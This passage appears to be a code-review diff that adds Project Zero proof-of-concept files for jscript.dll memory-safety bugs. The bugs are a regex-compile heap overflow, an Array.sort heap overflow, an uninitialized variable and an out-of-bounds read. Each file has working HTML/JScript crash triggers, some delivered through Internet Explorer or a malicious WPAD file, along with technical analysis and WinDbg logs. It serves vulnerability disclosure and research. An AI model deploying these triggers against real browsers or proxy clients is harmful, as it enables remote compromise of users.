in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
3d49750: 4518000 2000
000007feefb88726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2
00000000774c4255 ntdll!RtlDebugFreeHeap+0x0000000000000035
000000007746797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982
000007fefd4b10c8 msvcrt!free+0x000000000000001c
000007feedb9bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022
000007feedb9b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240
000007feedbb42cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d
000007feedb919e2 jscript!GcContext::Reclaim+0x00000000000000ae
000007feedba1956 jscript!GcContext::CollectCore+0x000000000000018b
000007feedba17a5 jscript!GcContext::Collect+0x0000000000000025
000007feedbe42f3 jscript!JsCollectGarbage+0x0000000000000023
000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
000007feedb9c199 jscript!NameTbl::InvokeInternal+0x0000000000000377
000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
000007feedb98d2b jscript!ScrFncObj::Call+0x00000000000000b7
000007feedbc2084 jscript!NameTbl::InvokeInternal+0x000000000000060f
000007feedb986ea jscript!VAR::InvokeByDispID+0xffffffffffffffea
000007feedbf8ee3 jscript!GCProtectKeyAndCall+0x000000000000009f
000007feedbf97a6 jscript!JSONApplyFilters+0x000000000000014a
000007feedbfa08b jscript!JSONStringifyObject+0x000000000000009b
000007feedbf9e77 jscript!JSONStringifyArray+0x0000000000000253
000007feedbfa2cc jscript!JSONStringifyObject+0x00000000000002dc
000007feedbfec94 jscript!JsJSONStringify+0x00000000000003e4
000007feedb9c2ec jscript!NatFncObj::Call+0x0000000000000138
000007feedb9a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8
000007feedb9b234 jscript!VAR::InvokeByName+0x000000000000081c
000007feedb99852 jscript!VAR::InvokeDispName+0x0000000000000072
000007feedb99929 jscript!VAR::InvokeByDispID+0x0000000000001229
000007feedb924b8 jscript!CScriptRuntime::Run+0x00000000000005a6
000007feedb98ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162
=========================================
-->
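Review bot: the technical-details paragraph and the PoC disagree on the callback name. The text says "JSONApplyFilters which calls an argument's toString method", but the PoC defines `toJSON` on both `o1` and `o2`, the `CollectGarbage()` call that frees the object sits inside `o2.toJSON`, and the `!heap` stack shows `JSONApplyFilters` -> `GCProtectKeyAndCall` -> script callback; say that the callback is `toJSON` (the hook `JSON.stringify` invokes before serializing a value) or explain where `toString` enters the path. Also, "There is a use-after-free in jscript.dll library" should read "in the jscript.dll library", and unlike the sibling PoCs in this commit the file omits the "might require page heap to trigger the crash" hint even though the `_DPH_HEAP_ROOT` entry in the debug log shows page heap was enabled when it was captured.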


@ -0,0 +1,150 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1369
There is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors:
- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
- The issue can also be exploited by opening a malicious web page in Internet Explorer. In this case, due to the sizes involved, a 64-bit tab process would most likely be required to trigger the issue. This is going to be the case for example when running IE in the Enhanced Protected Mode.
The issue has been verified on 64-bit Win7 and 64-bit Win10 with the most recent patches applied.
PoC for Internet Explorer:
============================================
-->
<!-- saved from url=(0014)about:internet -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
</head>
<body>
<script language="Jscript.Encode">
var s = 'a';
for(var i=0;i<28;i++) {
s = s+s;
}
s = s+'[a-z]'+s;
r = new RegExp();
r.compile(s);
</script>
</body>
</html>
<!--
============================================
PoC for WPAD:
============================================
function FindProxyForURL(url, host) {
var s = 'a';
for(var i=0;i<28;i++) {
s = s+s;
}
s = s+'[a-z]'+s;
r = new RegExp();
r.compile(s);
return "DIRECT";
}
===========================================
Technical details:
The issue is in RegExpComp::Compile (and several functions called from RegExpComp::Compile). RegExpComp::Compile is responsible for compiling a RegExp object. It maintains a buffer with the compilation result and extends it when necessary. Extending the buffer is handled using RegExpBase::EnsureSpace which looks (approximately) like:
void RegExpBase::EnsureSpace(int desired_size) {
if(desired_size > buffer_size) {
if(2 * desired_size < desired_size) {
//throw an exception
}
int new_size = 2 * desired_size;
char * new_buffer = realloc(buffer, new_size);
if(!new_buffer) {
//throw an exception
}
buffer = new_buffer;
buffer_size = new_size;
}
}
Note that desired_size is a signed 32-bit integer. RegExpBase::EnsureSpace has an integer overflow check, however if an overflow happens in the caller (a caller must add the size which it wants to append to the existing content size) and desired_size becomes negative, RegExpBase::EnsureSpace would simply return because of the first if() statement without attempting to extend the buffer.
Indeed, integer overflows can happen in the several callers of RegExpBase::EnsureSpace. The one being triggered in the PoC is in RegExpComp::Compile, when it attempts to append the raw input string to the buffer towards the end of the compilation process.
Debug log (from IE, but it looks similar in the WPAD service):
============================================
(b90.698): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
msvcrt!memcpy+0x1d9:
000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????
0:012> r
rax=0000000040000061 rbx=00000000042b7ea0 rcx=000000025bb60fe0
rdx=fffffffdfa4b0010 rsi=00000000042b5f48 rdi=000000004000000a
rip=000007fefefe123d rsp=0000000012399ef8 rbp=0000000012399f28
r8=0000000040000008 r9=0000000000000000 r10=6100610061006100
r11=000000021bb60fd8 r12=0000000016010fe8 r13=000007feebc91670
r14=0000000020000001 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
msvcrt!memcpy+0x1d9:
000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=????
0:012> k
# Child-SP RetAddr Call Site
00 00000000`12399ef8 000007fe`ebc88bb3 msvcrt!memcpy+0x1d9
01 00000000`12399f00 000007fe`ebcfacc2 jscript!RegExpComp::Compile+0x1b7
02 00000000`12399f60 000007fe`ebce2118 jscript!RegExpComp::CompileDynamic+0x62
03 00000000`12399fa0 000007fe`ebce3310 jscript!RegExpObj::Compile+0x32c
04 00000000`1239a0f0 000007fe`ebc7c2ec jscript!JsRegExpCompile+0x70
05 00000000`1239a140 000007fe`ebc7a9fe jscript!NatFncObj::Call+0x138
06 00000000`1239a1f0 000007fe`ebc7b234 jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`1239a310 000007fe`ebc79852 jscript!VAR::InvokeByName+0x81c
08 00000000`1239a520 000007fe`ebc79929 jscript!VAR::InvokeDispName+0x72
09 00000000`1239a5a0 000007fe`ebc724b8 jscript!VAR::InvokeByDispID+0x1229
0a 00000000`1239a5f0 000007fe`ebc78ec2 jscript!CScriptRuntime::Run+0x5a6
0b 00000000`1239b3f0 000007fe`ebc78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
0c 00000000`1239b600 000007fe`ebc78b95 jscript!ScrFncObj::Call+0xb7
0d 00000000`1239b6a0 000007fe`ebc7e6c0 jscript!CSession::Execute+0x19e
0e 00000000`1239b770 000007fe`ebc870e7 jscript!COleScript::ExecutePendingScripts+0x17a
0f 00000000`1239b840 000007fe`ebc868d6 jscript!COleScript::ParseScriptTextCore+0x267
10 00000000`1239b930 000007fe`ecdf5251 jscript!COleScript::ParseScriptText+0x56
11 00000000`1239b990 000007fe`ed57b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
12 00000000`1239ba10 000007fe`ecdf6256 MSHTML!CScriptCollection::ParseScriptText+0x37f
13 00000000`1239baf0 000007fe`ecdf5c8e MSHTML!CScriptData::CommitCode+0x3d9
14 00000000`1239bcc0 000007fe`ecdf5a11 MSHTML!CScriptData::Execute+0x283
15 00000000`1239bd80 000007fe`ed5b46fb MSHTML!CHtmScriptParseCtx::Execute+0x101
16 00000000`1239bdc0 000007fe`ece98a5b MSHTML!CHtmParseBase::Execute+0x235
17 00000000`1239be60 000007fe`ecd72e39 MSHTML!CHtmPost::Broadcast+0x90
18 00000000`1239bea0 000007fe`ecdccaef MSHTML!CHtmPost::Exec+0x4bb
19 00000000`1239c0b0 000007fe`ecdcca40 MSHTML!CHtmPost::Run+0x3f
1a 00000000`1239c0e0 000007fe`ecdcda12 MSHTML!PostManExecute+0x70
1b 00000000`1239c160 000007fe`ecdd0843 MSHTML!PostManResume+0xa1
1c 00000000`1239c1a0 000007fe`ecdb6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1d 00000000`1239c1f0 000007fe`ed5e4f78 MSHTML!CDwnChan::OnMethodCall+0x41
1e 00000000`1239c220 000007fe`eccd9d75 MSHTML!GlobalWndOnMethodCall+0x240
1f 00000000`1239c2c0 00000000`77229bbd MSHTML!GlobalWndProc+0x150
20 00000000`1239c340 00000000`772298c2 USER32!UserCallWinProcCheckWow+0x1ad
21 00000000`1239c400 000007fe`f29d4a87 USER32!DispatchMessageWorker+0x3b5
22 00000000`1239c480 000007fe`f29dbabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
23 00000000`1239f700 000007fe`fd73572f IEFRAME!LCIETab_ThreadProc+0x3a3
24 00000000`1239f830 000007fe`ee62925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
25 00000000`1239f860 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
26 00000000`1239f8b0 00000000`7745a561 kernel32!BaseThreadInitThunk+0xd
27 00000000`1239f8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
============================================
-->
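Review bot: the RegExpBase::EnsureSpace sketch in the technical details only guards the doubling (`if(2 * desired_size < desired_size)`) and never rejects a negative `desired_size`, while the paragraph under it says the overflow actually happens in the caller's addition before EnsureSpace is entered; the hunk would read more clearly if the sketch carried a `desired_size < 0` check flagged as the missing one, or if the text stated outright that the fix belongs in RegExpComp::Compile and the other callers that compute the sum. Tying the debug log back to that first `if()` would also help: frame 00 is the memcpy of the raw input string faulting on `mov word ptr [rcx],ax` at 00000002`5bb60fe0, which is the write that runs past the buffer EnsureSpace declined to grow.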

@ -0,0 +1,117 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1383
There is an heap overflow vulnerability in jscript.dll library (used in IE, WPAD and other places). The bug affects 2 functions, JsArrayStringHeapSort and JsArrayFunctionHeapSort.
PoC for IE (note: page heap might be required to obsorve the crash):
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var vars = new Array(100);
var arr = new Array(1000);
for(var i=1;i<600;i++) arr[i] = i;
var o = {toString:function() {
for(var i=600;i<1000;i++) {
arr[i] = 1337;
}
}}
function go() {
arr[0] = o;
Array.prototype.sort.call(arr);
}
go();
</script>
<!--
=========================================
Technical details:
Array.sort is implemented in JsArraySort which, depending if a comparison function was specified or not, calls JsArrayStringHeapSort or JsArrayFunctionHeapSort. These (vulnerable) functions take several arguments, 2 of which are the input array length and the number of elements currently in the input array (this can be smaller than the array length). The vulnerable functions are going to allcoate 2 buffers to store intermediate data. The size of these buffers will be calculated based on *num_elements*. However, while filling those arrays it is possible that the number of elements is going to increase, which causes a heap overflow.
Debug log:
=========================================
0:023> g
(e5c.988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!NameTbl::GetValCore+0x30:
000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????
0:013> r
rax=c0c0c0c0c0c00003 rbx=000000000443cf20 rcx=000000000441df90
rdx=0000000000000003 rsi=0000000004603010 rdi=000000000441df90
rip=000007fef4f59df0 rsp=00000000129a8e10 rbp=0000000000000000
r8=0000000004603010 r9=000000000441fdc8 r10=00000000040a9800
r11=00000000129a8e70 r12=0000000003ecb690 r13=0000000000000001
r14=0000000004603010 r15=0000000000000259
iopl=0 nv up ei ng nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283
jscript!NameTbl::GetValCore+0x30:
000007fe`f4f59df0 498900 mov qword ptr [r8],rax ds:00000000`04603010=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 00000000`129a8e10 000007fe`f4f75f0e jscript!NameTbl::GetValCore+0x30
01 00000000`129a8e70 000007fe`f4f761d8 jscript!ArrayObj::GetValAtIndex+0x62
02 00000000`129a8eb0 000007fe`f4fbd5a2 jscript!ArrayObj::GetVal+0x28
03 00000000`129a8f40 000007fe`f4fbcd90 jscript!JsArrayStringHeapSort+0x1a6
04 00000000`129a90d0 000007fe`f4f5c2ec jscript!JsArraySort+0x270
05 00000000`129a9180 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
06 00000000`129a9230 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x3f8
07 00000000`129a9350 000007fe`f4fadd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
08 00000000`129a93a0 000007fe`f4f5c2ec jscript!JsFncCall+0xc2
09 00000000`129a9430 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138
0a 00000000`129a94e0 000007fe`f4f5b234 jscript!NameTbl::InvokeInternal+0x3f8
0b 00000000`129a9600 000007fe`f4f59852 jscript!VAR::InvokeByName+0x81c
0c 00000000`129a9810 000007fe`f4f59929 jscript!VAR::InvokeDispName+0x72
0d 00000000`129a9890 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0x1229
0e 00000000`129a98e0 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
0f 00000000`129aa6e0 000007fe`f4f594b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
10 00000000`129aa8f0 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x2d3
11 00000000`129aaa10 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
12 00000000`129aaa60 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6
13 00000000`129ab860 000007fe`f4f58d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
14 00000000`129aba70 000007fe`f4f58b95 jscript!ScrFncObj::Call+0xb7
15 00000000`129abb10 000007fe`f4f5e6c0 jscript!CSession::Execute+0x19e
16 00000000`129abbe0 000007fe`f4f670e7 jscript!COleScript::ExecutePendingScripts+0x17a
17 00000000`129abcb0 000007fe`f4f668d6 jscript!COleScript::ParseScriptTextCore+0x267
18 00000000`129abda0 000007fe`ec595251 jscript!COleScript::ParseScriptText+0x56
19 00000000`129abe00 000007fe`ecd1b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
1a 00000000`129abe80 000007fe`ec596256 MSHTML!CScriptCollection::ParseScriptText+0x37f
1b 00000000`129abf60 000007fe`ec595c8e MSHTML!CScriptData::CommitCode+0x3d9
1c 00000000`129ac130 000007fe`ec595a11 MSHTML!CScriptData::Execute+0x283
1d 00000000`129ac1f0 000007fe`ecd546fb MSHTML!CHtmScriptParseCtx::Execute+0x101
1e 00000000`129ac230 000007fe`ec638a5b MSHTML!CHtmParseBase::Execute+0x235
1f 00000000`129ac2d0 000007fe`ec512e39 MSHTML!CHtmPost::Broadcast+0x90
20 00000000`129ac310 000007fe`ec56caef MSHTML!CHtmPost::Exec+0x4bb
21 00000000`129ac520 000007fe`ec56ca40 MSHTML!CHtmPost::Run+0x3f
22 00000000`129ac550 000007fe`ec56da12 MSHTML!PostManExecute+0x70
23 00000000`129ac5d0 000007fe`ec570843 MSHTML!PostManResume+0xa1
24 00000000`129ac610 000007fe`ec556fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
25 00000000`129ac660 000007fe`ecd84f78 MSHTML!CDwnChan::OnMethodCall+0x41
26 00000000`129ac690 000007fe`ec479d75 MSHTML!GlobalWndOnMethodCall+0x240
27 00000000`129ac730 00000000`76d19bbd MSHTML!GlobalWndProc+0x150
28 00000000`129ac7b0 00000000`76d198c2 USER32!UserCallWinProcCheckWow+0x1ad
29 00000000`129ac870 000007fe`f11a4a87 USER32!DispatchMessageWorker+0x3b5
2a 00000000`129ac8f0 000007fe`f11ababb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
2b 00000000`129afb70 000007fe`fd48572f IEFRAME!LCIETab_ThreadProc+0x3a3
2c 00000000`129afca0 000007fe`f521925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
2d 00000000`129afcd0 00000000`76e159cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
2e 00000000`129afd20 00000000`76f4a561 kernel32!BaseThreadInitThunk+0xd
2f 00000000`129afd50 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
=========================================
-->
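Review bot: the description names both JsArrayStringHeapSort and JsArrayFunctionHeapSort as affected, but the PoC calls `Array.prototype.sort.call(arr)` with no comparison function, so only the string path is exercised (frame 03 in the log is JsArrayStringHeapSort); a second variant that passes a comparator would cover the function path too. Two typos in the same hunk: "obsorve" should be "observe" and "allcoate" should be "allocate".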

@ -0,0 +1,138 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1378
There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- By opening a malicious web page in Internet Explorer.
- [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.
The issue has been verified on 64-bit Windows 10 with the most recent patches applied.
PoC for Internet Explorer (tested on IE 11 with a 64-bit tab process. Might no work very reliably due to the nature of the issue, please see the technical details below):
============================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var x = new URIError(new Array(), undefined, undefined);
String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));
Array.prototype.slice.call(1);
</script>
<!--
============================================
Technical details:
The issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above, all other lines are just fuzzer generated junk that puts the stack into a 'correct' state needed to demonstrate the issue).
JsArraySlice looks approximately like:
int JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {
VAR object;
VAR length;
NameTbl *nametable;
if(!ConvertToObject(session, this, &object, 0)) {
//set error and return
}
if(!IsJSObject(&object, &nametable)) {
//set error and return
}
if(nametable->GetVal(&g_sym_length, &length) < 0) {
//set error and return
}
if(length->type != TYPE_INT) {
ConvertToScalar(session, &length, &length, 3, 1);
}
...
}
The issue is that JsArraySlice() expects NameTBL::GetVal() to return an integer <0 if the input object does not contain the 'length' property. However in this case NameTBL::GetVal() will actually return 1. Also, in this case, the length VAR is *not* going to be initialized. Thus if NameTBL::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of length VAR, this might lead to exploitable conditions including calling a virtual method on the uninitialized pointer (see below).
Debug log:
============================================
(a3c.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> r
rax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904
rdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904
rip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0
r8=000000f42f0fb230 r9=000000f42f0fb2a0 r10=0000000000000080
r11=5555555511140000 r12=0000000000000000 r13=0000000000000000
r14=000002a7533c5a70 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> k
# Child-SP RetAddr Call Site
00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd
01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f
02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51
03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f
04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135
06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87
07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0
08 000000f4`2f0fb780 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135
0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580
0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60
0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb
0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f
0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d
0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8
10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265
11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b
12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239
13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56
14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8
15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d
16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4
17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267
18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf
19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181
1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50
1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a
1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32
1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70
1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1
1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40
20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c
21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251
22 000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9
23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274
24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac
25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7
26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4
27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89
29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14
2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:014> u rip
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8]
00007ffa`e45a4601 ff15c14d0700 call qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]
00007ffa`e45a4607 488d442458 lea rax,[rsp+58h]
00007ffa`e45a460c 458bc4 mov r8d,r12d
00007ffa`e45a460f 4889442448 mov qword ptr [rsp+48h],rax
00007ffa`e45a4614 488bd7 mov rdx,rdi
00007ffa`e45a4617 488d4580 lea rax,[rbp-80h]
00007ffa`e45a461b 498bce mov rcx,r14
============================================
-->
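Review bot: in the JsArraySlice sketch, `length` is declared as `VAR length;` and passed as `&length`, but then read as `length->type`; that should be `length.type` (or the declaration should be a pointer) so the sketch is consistent. The prose already gives the fix implicitly: initialize `length` before calling GetVal and treat a return of 1 with no populated VAR as "no length property" rather than falling into ConvertToScalar; saying so in one sentence would help readers. Also "Might no work very reliably" should read "Might not work very reliably".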

@ -0,0 +1,91 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1382
There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places):
PoC for IE (note: page heap might be required to obsorve the crash):
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
function go() {
var r= new RegExp(Array(100).join('()'));
''.search(r);
alert(RegExp.lastParen);
}
go();
</script>
<!--
=========================================
Debug log:
=========================================
(cec.a14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
0:014> r
rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063
rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0
rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148
r8=00000000130f9210 r9=0000000000000000 r10=000000000463fef0
r11=000000000463ff38 r12=0000000000000083 r13=0000000000000000
r14=00000000130f9210 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????
0:014> k
# Child-SP RetAddr Call Site
00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43
01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5
02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873
03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373
04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3
06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6
08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7
0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e
0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a
0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267
0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56
0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f
10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9
11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283
12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101
13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235
14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90
15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb
16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f
17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70
18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1
19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41
1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240
1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
